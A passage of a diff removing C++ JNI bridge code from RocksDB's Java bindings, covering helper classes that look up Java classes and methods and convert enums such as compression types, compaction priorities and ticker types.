-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getIteratorClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/util/Iterator");
-  }
-
-  /**
-   * Get the Java Method: List#iterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getIteratorMethod(JNIEnv* env) {
-    jclass jlist_clazz = getListClass(env);
-    if(jlist_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jlist_clazz, "iterator", "()Ljava/util/Iterator;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Iterator#hasNext
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getHasNextMethod(JNIEnv* env) {
-    jclass jiterator_clazz = getIteratorClass(env);
-    if(jiterator_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jiterator_clazz, "hasNext", "()Z");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Iterator#next
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getNextMethod(JNIEnv* env) {
-    jclass jiterator_clazz = getIteratorClass(env);
-    if(jiterator_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jiterator_clazz, "next", "()Ljava/lang/Object;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: ArrayList constructor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getArrayListConstructorMethodId(JNIEnv* env) {
-    jclass jarray_list_clazz = getArrayListClass(env);
-    if(jarray_list_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-    static jmethodID mid =
-        env->GetMethodID(jarray_list_clazz, "<init>", "(I)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: List#add
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getListAddMethodId(JNIEnv* env) {
-    jclass jlist_clazz = getListClass(env);
-    if(jlist_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jlist_clazz, "add", "(Ljava/lang/Object;)Z");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for java.lang.Byte
-class ByteJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class java.lang.Byte
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/lang/Byte");
-  }
-
-  /**
-   * Get the Java Class byte[]
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getArrayJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "[B");
-  }
-
-  /**
-   * Creates a new 2-dimensional Java Byte Array byte[][]
-   *
-   * @param env A pointer to the Java environment
-   * @param len The size of the first dimension
-   *
-   * @return A reference to the Java byte[][] or nullptr if an exception occurs
-   */
-  static jobjectArray new2dByteArray(JNIEnv* env, const jsize len) {
-    jclass clazz = getArrayJClass(env);
-    if(clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    return env->NewObjectArray(len, clazz, nullptr);
-  }
-
-  /**
-   * Get the Java Method: Byte#byteValue
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getByteValueMethod(JNIEnv* env) {
-    jclass clazz = getJClass(env);
-    if(clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(clazz, "byteValue", "()B");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for java.lang.StringBuilder
-class StringBuilderJni : public JavaClass {
-  public:
-  /**
-   * Get the Java Class java.lang.StringBuilder
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/lang/StringBuilder");
-  }
-
-  /**
-   * Get the Java Method: StringBuilder#append
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getListAddMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "append",
-            "(Ljava/lang/String;)Ljava/lang/StringBuilder;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Appends a C-style string to a StringBuilder
-   *
-   * @param env A pointer to the Java environment
-   * @param jstring_builder Reference to a java.lang.StringBuilder
-   * @param c_str A C-style string to append to the StringBuilder
-   *
-   * @return A reference to the updated StringBuilder, or a nullptr if
-   *     an exception occurs
-   */
-  static jobject append(JNIEnv* env, jobject jstring_builder,
-      const char* c_str) {
-    jmethodID mid = getListAddMethodId(env);
-    if(mid == nullptr) {
-      // exception occurred accessing class or method
-      return nullptr;
-    }
-
-    jstring new_value_str = env->NewStringUTF(c_str);
-    if(new_value_str == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    jobject jresult_string_builder =
-        env->CallObjectMethod(jstring_builder, mid, new_value_str);
-    if(env->ExceptionCheck()) {
-      // exception occurred
-      env->DeleteLocalRef(new_value_str);
-      return nullptr;
-    }
-
-    return jresult_string_builder;
-  }
-};
-
-// The portal class for org.rocksdb.BackupInfo
-class BackupInfoJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.BackupInfo
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/BackupInfo");
-  }
-
-  /**
-   * Constructs a BackupInfo object
-   *
-   * @param env A pointer to the Java environment
-   * @param backup_id id of the backup
-   * @param timestamp timestamp of the backup
-   * @param size size of the backup
-   * @param number_files number of files related to the backup
-   *
-   * @return A reference to a Java BackupInfo object, or a nullptr if an
-   *     exception occurs
-   */
-  static jobject construct0(JNIEnv* env, uint32_t backup_id, int64_t timestamp,
-      uint64_t size, uint32_t number_files) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "(IJJI)V");
-    if(mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    jobject jbackup_info =
-        env->NewObject(jclazz, mid, backup_id, timestamp, size, number_files);
-    if(env->ExceptionCheck()) {
-      return nullptr;
-    }
-
-    return jbackup_info;
-  }
-};
-
-class BackupInfoListJni {
- public:
-  /**
-   * Converts a C++ std::vector<BackupInfo> object to
-   * a Java ArrayList<org.rocksdb.BackupInfo> object
-   *
-   * @param env A pointer to the Java environment
-   * @param backup_infos A vector of BackupInfo
-   *
-   * @return Either a reference to a Java ArrayList object, or a nullptr
-   *     if an exception occurs
-   */
-  static jobject getBackupInfo(JNIEnv* env,
-      std::vector<BackupInfo> backup_infos) {
-    jclass jarray_list_clazz = rocksdb::ListJni::getArrayListClass(env);
-    if(jarray_list_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jmethodID cstr_mid = rocksdb::ListJni::getArrayListConstructorMethodId(env);
-    if(cstr_mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    jmethodID add_mid = rocksdb::ListJni::getListAddMethodId(env);
-    if(add_mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    // create java list
-    jobject jbackup_info_handle_list =
-        env->NewObject(jarray_list_clazz, cstr_mid, backup_infos.size());
-    if(env->ExceptionCheck()) {
-      // exception occurred constructing object
-      return nullptr;
-    }
-
-    // insert in java list
-    auto end = backup_infos.end();
-    for (auto it = backup_infos.begin(); it != end; ++it) {
-      auto backup_info = *it;
-
-      jobject obj = rocksdb::BackupInfoJni::construct0(env,
-          backup_info.backup_id,
-          backup_info.timestamp,
-          backup_info.size,
-          backup_info.number_files);
-      if(env->ExceptionCheck()) {
-        // exception occurred constructing object
-        if(obj != nullptr) {
-          env->DeleteLocalRef(obj);
-        }
-        if(jbackup_info_handle_list != nullptr) {
-          env->DeleteLocalRef(jbackup_info_handle_list);
-        }
-        return nullptr;
-      }
-
-      jboolean rs =
-          env->CallBooleanMethod(jbackup_info_handle_list, add_mid, obj);
-      if(env->ExceptionCheck() || rs == JNI_FALSE) {
-        // exception occurred calling method, or could not add
-        if(obj != nullptr) {
-          env->DeleteLocalRef(obj);
-        }
-        if(jbackup_info_handle_list != nullptr) {
-          env->DeleteLocalRef(jbackup_info_handle_list);
-        }
-        return nullptr;
-      }
-    }
-
-    return jbackup_info_handle_list;
-  }
-};
-
-// The portal class for org.rocksdb.WBWIRocksIterator
-class WBWIRocksIteratorJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WBWIRocksIterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/WBWIRocksIterator");
-  }
-
-  /**
-   * Get the Java Field: WBWIRocksIterator#entry
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Field ID or nullptr if the class or field id could not
-   *     be retieved
-   */
-  static jfieldID getWriteEntryField(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jfieldID fid =
-        env->GetFieldID(jclazz, "entry",
-            "Lorg/rocksdb/WBWIRocksIterator$WriteEntry;");
-    assert(fid != nullptr);
-    return fid;
-  }
-
-  /**
-   * Gets the value of the WBWIRocksIterator#entry
-   *
-   * @param env A pointer to the Java environment 
-   * @param jwbwi_rocks_iterator A reference to a WBWIIterator
-   *
-   * @return A reference to a Java WBWIRocksIterator.WriteEntry object, or
-   *     a nullptr if an exception occurs
-   */
-  static jobject getWriteEntry(JNIEnv* env, jobject jwbwi_rocks_iterator) {
-    assert(jwbwi_rocks_iterator != nullptr);
-
-    jfieldID jwrite_entry_field = getWriteEntryField(env);
-    if(jwrite_entry_field == nullptr) {
-      // exception occurred accessing the field
-      return nullptr;
-    }
-
-    jobject jwe = env->GetObjectField(jwbwi_rocks_iterator, jwrite_entry_field);
-    assert(jwe != nullptr);
-    return jwe;
-  }
-};
-
-// The portal class for org.rocksdb.WBWIRocksIterator.WriteType
-class WriteTypeJni : public JavaClass {
- public:
-    /**
-     * Get the PUT enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject PUT(JNIEnv* env) {
-      return getEnum(env, "PUT");
-    }
-
-    /**
-     * Get the MERGE enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject MERGE(JNIEnv* env) {
-      return getEnum(env, "MERGE");
-    }
-
-    /**
-     * Get the DELETE enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject DELETE(JNIEnv* env) {
-      return getEnum(env, "DELETE");
-    }
-
-    /**
-     * Get the LOG enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject LOG(JNIEnv* env) {
-      return getEnum(env, "LOG");
-    }
-
- private:
-  /**
-   * Get the Java Class org.rocksdb.WBWIRocksIterator.WriteType
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/WBWIRocksIterator$WriteType");
-  }
-
-  /**
-   * Get an enum field of org.rocksdb.WBWIRocksIterator.WriteType
-   *
-   * @param env A pointer to the Java environment
-   * @param name The name of the enum field
-   *
-   * @return A reference to the enum field value or a nullptr if
-   *     the enum field value could not be retrieved
-   */
-  static jobject getEnum(JNIEnv* env, const char name[]) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jfieldID jfid =
-        env->GetStaticFieldID(jclazz, name,
-            "Lorg/rocksdb/WBWIRocksIterator$WriteType;");
-    if(env->ExceptionCheck()) {
-      // exception occurred while getting field
-      return nullptr;
-    } else if(jfid == nullptr) {
-      return nullptr;
-    }
-
-    jobject jwrite_type = env->GetStaticObjectField(jclazz, jfid);
-    assert(jwrite_type != nullptr);
-    return jwrite_type;
-  }
-};
-
-// The portal class for org.rocksdb.WBWIRocksIterator.WriteEntry
-class WriteEntryJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WBWIRocksIterator.WriteEntry
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-    static jclass getJClass(JNIEnv* env) {
-      return JavaClass::getJClass(env, "org/rocksdb/WBWIRocksIterator$WriteEntry");
-    }
-};
-
-// The portal class for org.rocksdb.InfoLogLevel
-class InfoLogLevelJni : public JavaClass {
- public:
-    /**
-     * Get the DEBUG_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject DEBUG_LEVEL(JNIEnv* env) {
-      return getEnum(env, "DEBUG_LEVEL");
-    }
-
-    /**
-     * Get the INFO_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject INFO_LEVEL(JNIEnv* env) {
-      return getEnum(env, "INFO_LEVEL");
-    }
-
-    /**
-     * Get the WARN_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject WARN_LEVEL(JNIEnv* env) {
-      return getEnum(env, "WARN_LEVEL");
-    }
-
-    /**
-     * Get the ERROR_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject ERROR_LEVEL(JNIEnv* env) {
-      return getEnum(env, "ERROR_LEVEL");
-    }
-
-    /**
-     * Get the FATAL_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject FATAL_LEVEL(JNIEnv* env) {
-      return getEnum(env, "FATAL_LEVEL");
-    }
-
-    /**
-     * Get the HEADER_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject HEADER_LEVEL(JNIEnv* env) {
-      return getEnum(env, "HEADER_LEVEL");
-    }
-
- private:
-  /**
-   * Get the Java Class org.rocksdb.InfoLogLevel
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/InfoLogLevel");
-  }
-
-  /**
-   * Get an enum field of org.rocksdb.InfoLogLevel
-   *
-   * @param env A pointer to the Java environment
-   * @param name The name of the enum field
-   *
-   * @return A reference to the enum field value or a nullptr if
-   *     the enum field value could not be retrieved
-   */
-  static jobject getEnum(JNIEnv* env, const char name[]) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jfieldID jfid =
-        env->GetStaticFieldID(jclazz, name, "Lorg/rocksdb/InfoLogLevel;");
-    if(env->ExceptionCheck()) {
-      // exception occurred while getting field
-      return nullptr;
-    } else if(jfid == nullptr) {
-      return nullptr;
-    }
-
-    jobject jinfo_log_level = env->GetStaticObjectField(jclazz, jfid);
-    assert(jinfo_log_level != nullptr);
-    return jinfo_log_level;
-  }
-};
-
-// The portal class for org.rocksdb.Logger
-class LoggerJni : public RocksDBNativeClass<
-    std::shared_ptr<rocksdb::LoggerJniCallback>*, LoggerJni> {
- public:
-  /**
-   * Get the Java Class org/rocksdb/Logger
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Logger");
-  }
-
-  /**
-   * Get the Java Method: Logger#log
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getLogMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "log",
-            "(Lorg/rocksdb/InfoLogLevel;Ljava/lang/String;)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.TransactionLogIterator.BatchResult
-class BatchResultJni : public JavaClass {
-  public:
-  /**
-   * Get the Java Class org.rocksdb.TransactionLogIterator.BatchResult
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env,
-        "org/rocksdb/TransactionLogIterator$BatchResult");
-  }
-
-  /**
-   * Create a new Java org.rocksdb.TransactionLogIterator.BatchResult object
-   * with the same properties as the provided C++ rocksdb::BatchResult object
-   *
-   * @param env A pointer to the Java environment
-   * @param batch_result The rocksdb::BatchResult object
-   *
-   * @return A reference to a Java
-   *     org.rocksdb.TransactionLogIterator.BatchResult object,
-   *     or nullptr if an an exception occurs
-   */
-  static jobject construct(JNIEnv* env,
-      rocksdb::BatchResult& batch_result) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jmethodID mid = env->GetMethodID(
-      jclazz, "<init>", "(JJ)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      return nullptr;
-    }
-
-    jobject jbatch_result = env->NewObject(jclazz, mid,
-      batch_result.sequence, batch_result.writeBatchPtr.get());
-    if(jbatch_result == nullptr) {
-      // exception thrown: InstantiationException or OutOfMemoryError
-      return nullptr;
-    }
-
-    batch_result.writeBatchPtr.release();
-    return jbatch_result;
-  }
-};
-
-// The portal class for org.rocksdb.CompactionStopStyle
-class CompactionStopStyleJni {
- public:
-  // Returns the equivalent org.rocksdb.CompactionStopStyle for the provided
-  // C++ rocksdb::CompactionStopStyle enum
-  static jbyte toJavaCompactionStopStyle(
-      const rocksdb::CompactionStopStyle& compaction_stop_style) {
-    switch(compaction_stop_style) {
-      case rocksdb::CompactionStopStyle::kCompactionStopStyleSimilarSize:
-        return 0x0;
-      case rocksdb::CompactionStopStyle::kCompactionStopStyleTotalSize:
-        return 0x1;
-      default:
-        return 0x7F;  // undefined
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::CompactionStopStyle enum for the
-  // provided Java org.rocksdb.CompactionStopStyle
-  static rocksdb::CompactionStopStyle toCppCompactionStopStyle(
-      jbyte jcompaction_stop_style) {
-    switch(jcompaction_stop_style) {
-      case 0x0:
-        return rocksdb::CompactionStopStyle::kCompactionStopStyleSimilarSize;
-      case 0x1:
-        return rocksdb::CompactionStopStyle::kCompactionStopStyleTotalSize;
-      default:
-        // undefined/default
-        return rocksdb::CompactionStopStyle::kCompactionStopStyleSimilarSize;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.CompressionType
-class CompressionTypeJni {
- public:
-  // Returns the equivalent org.rocksdb.CompressionType for the provided
-  // C++ rocksdb::CompressionType enum
-  static jbyte toJavaCompressionType(
-      const rocksdb::CompressionType& compression_type) {
-    switch(compression_type) {
-      case rocksdb::CompressionType::kNoCompression:
-        return 0x0;
-      case rocksdb::CompressionType::kSnappyCompression:
-        return 0x1;
-      case rocksdb::CompressionType::kZlibCompression:
-        return 0x2;
-      case rocksdb::CompressionType::kBZip2Compression:
-        return 0x3;
-      case rocksdb::CompressionType::kLZ4Compression:
-        return 0x4;
-      case rocksdb::CompressionType::kLZ4HCCompression:
-        return 0x5;
-      case rocksdb::CompressionType::kXpressCompression:
-        return 0x6;
-      case rocksdb::CompressionType::kZSTD:
-        return 0x7;
-      case rocksdb::CompressionType::kDisableCompressionOption:
-      default:
-        return 0x7F;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::CompressionType enum for the
-  // provided Java org.rocksdb.CompressionType
-  static rocksdb::CompressionType toCppCompressionType(
-      jbyte jcompression_type) {
-    switch(jcompression_type) {
-      case 0x0:
-        return rocksdb::CompressionType::kNoCompression;
-      case 0x1:
-        return rocksdb::CompressionType::kSnappyCompression;
-      case 0x2:
-        return rocksdb::CompressionType::kZlibCompression;
-      case 0x3:
-        return rocksdb::CompressionType::kBZip2Compression;
-      case 0x4:
-        return rocksdb::CompressionType::kLZ4Compression;
-      case 0x5:
-        return rocksdb::CompressionType::kLZ4HCCompression;
-      case 0x6:
-        return rocksdb::CompressionType::kXpressCompression;
-      case 0x7:
-        return rocksdb::CompressionType::kZSTD;
-      case 0x7F:
-      default:
-        return rocksdb::CompressionType::kDisableCompressionOption;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.CompactionPriority
-class CompactionPriorityJni {
- public:
-  // Returns the equivalent org.rocksdb.CompactionPriority for the provided
-  // C++ rocksdb::CompactionPri enum
-  static jbyte toJavaCompactionPriority(
-      const rocksdb::CompactionPri& compaction_priority) {
-    switch(compaction_priority) {
-      case rocksdb::CompactionPri::kByCompensatedSize:
-        return 0x0;
-      case rocksdb::CompactionPri::kOldestLargestSeqFirst:
-        return 0x1;
-      case rocksdb::CompactionPri::kOldestSmallestSeqFirst:
-        return 0x2;
-      case rocksdb::CompactionPri::kMinOverlappingRatio:
-        return 0x3;
-      default:
-        return 0x0;  // undefined
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::CompactionPri enum for the
-  // provided Java org.rocksdb.CompactionPriority
-  static rocksdb::CompactionPri toCppCompactionPriority(
-      jbyte jcompaction_priority) {
-    switch(jcompaction_priority) {
-      case 0x0:
-        return rocksdb::CompactionPri::kByCompensatedSize;
-      case 0x1:
-        return rocksdb::CompactionPri::kOldestLargestSeqFirst;
-      case 0x2:
-        return rocksdb::CompactionPri::kOldestSmallestSeqFirst;
-      case 0x3:
-        return rocksdb::CompactionPri::kMinOverlappingRatio;
-      default:
-        // undefined/default
-        return rocksdb::CompactionPri::kByCompensatedSize;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.AccessHint
-class AccessHintJni {
- public:
-  // Returns the equivalent org.rocksdb.AccessHint for the provided
-  // C++ rocksdb::DBOptions::AccessHint enum
-  static jbyte toJavaAccessHint(
-      const rocksdb::DBOptions::AccessHint& access_hint) {
-    switch(access_hint) {
-      case rocksdb::DBOptions::AccessHint::NONE:
-        return 0x0;
-      case rocksdb::DBOptions::AccessHint::NORMAL:
-        return 0x1;
-      case rocksdb::DBOptions::AccessHint::SEQUENTIAL:
-        return 0x2;
-      case rocksdb::DBOptions::AccessHint::WILLNEED:
-        return 0x3;
-      default:
-        // undefined/default
-        return 0x1;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::DBOptions::AccessHint enum for the
-  // provided Java org.rocksdb.AccessHint
-  static rocksdb::DBOptions::AccessHint toCppAccessHint(jbyte jaccess_hint) {
-    switch(jaccess_hint) {
-      case 0x0:
-        return rocksdb::DBOptions::AccessHint::NONE;
-      case 0x1:
-        return rocksdb::DBOptions::AccessHint::NORMAL;
-      case 0x2:
-        return rocksdb::DBOptions::AccessHint::SEQUENTIAL;
-      case 0x3:
-        return rocksdb::DBOptions::AccessHint::WILLNEED;
-      default:
-        // undefined/default
-        return rocksdb::DBOptions::AccessHint::NORMAL;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.WALRecoveryMode
-class WALRecoveryModeJni {
- public:
-  // Returns the equivalent org.rocksdb.WALRecoveryMode for the provided
-  // C++ rocksdb::WALRecoveryMode enum
-  static jbyte toJavaWALRecoveryMode(
-      const rocksdb::WALRecoveryMode& wal_recovery_mode) {
-    switch(wal_recovery_mode) {
-      case rocksdb::WALRecoveryMode::kTolerateCorruptedTailRecords:
-        return 0x0;
-      case rocksdb::WALRecoveryMode::kAbsoluteConsistency:
-        return 0x1;
-      case rocksdb::WALRecoveryMode::kPointInTimeRecovery:
-        return 0x2;
-      case rocksdb::WALRecoveryMode::kSkipAnyCorruptedRecords:
-        return 0x3;
-      default:
-        // undefined/default
-        return 0x2;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::WALRecoveryMode enum for the
-  // provided Java org.rocksdb.WALRecoveryMode
-  static rocksdb::WALRecoveryMode toCppWALRecoveryMode(jbyte jwal_recovery_mode) {
-    switch(jwal_recovery_mode) {
-      case 0x0:
-        return rocksdb::WALRecoveryMode::kTolerateCorruptedTailRecords;
-      case 0x1:
-        return rocksdb::WALRecoveryMode::kAbsoluteConsistency;
-      case 0x2:
-        return rocksdb::WALRecoveryMode::kPointInTimeRecovery;
-      case 0x3:
-        return rocksdb::WALRecoveryMode::kSkipAnyCorruptedRecords;
-      default:
-        // undefined/default
-        return rocksdb::WALRecoveryMode::kPointInTimeRecovery;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.TickerType
-class TickerTypeJni {
- public:
-  // Returns the equivalent org.rocksdb.TickerType for the provided
-  // C++ rocksdb::Tickers enum
-  static jbyte toJavaTickerType(
-      const rocksdb::Tickers& tickers) {
-    switch(tickers) {
-      case rocksdb::Tickers::BLOCK_CACHE_MISS:
-        return 0x0;
-      case rocksdb::Tickers::BLOCK_CACHE_HIT:
-        return 0x1;
-      case rocksdb::Tickers::BLOCK_CACHE_ADD:
-        return 0x2;
-      case rocksdb::Tickers::BLOCK_CACHE_ADD_FAILURES:
-        return 0x3;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_MISS:
-        return 0x4;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_HIT:
-        return 0x5;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_ADD:
-        return 0x6;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_INSERT:
-        return 0x7;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_EVICT:
-        return 0x8;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_MISS:
-        return 0x9;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_HIT:
-        return 0xA;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_ADD:
-        return 0xB;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_INSERT:
-        return 0xC;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_EVICT:
-        return 0xD;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_MISS:
-        return 0xE;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_HIT:
-        return 0xF;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_ADD:
-        return 0x10;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_BYTES_INSERT:
-        return 0x11;
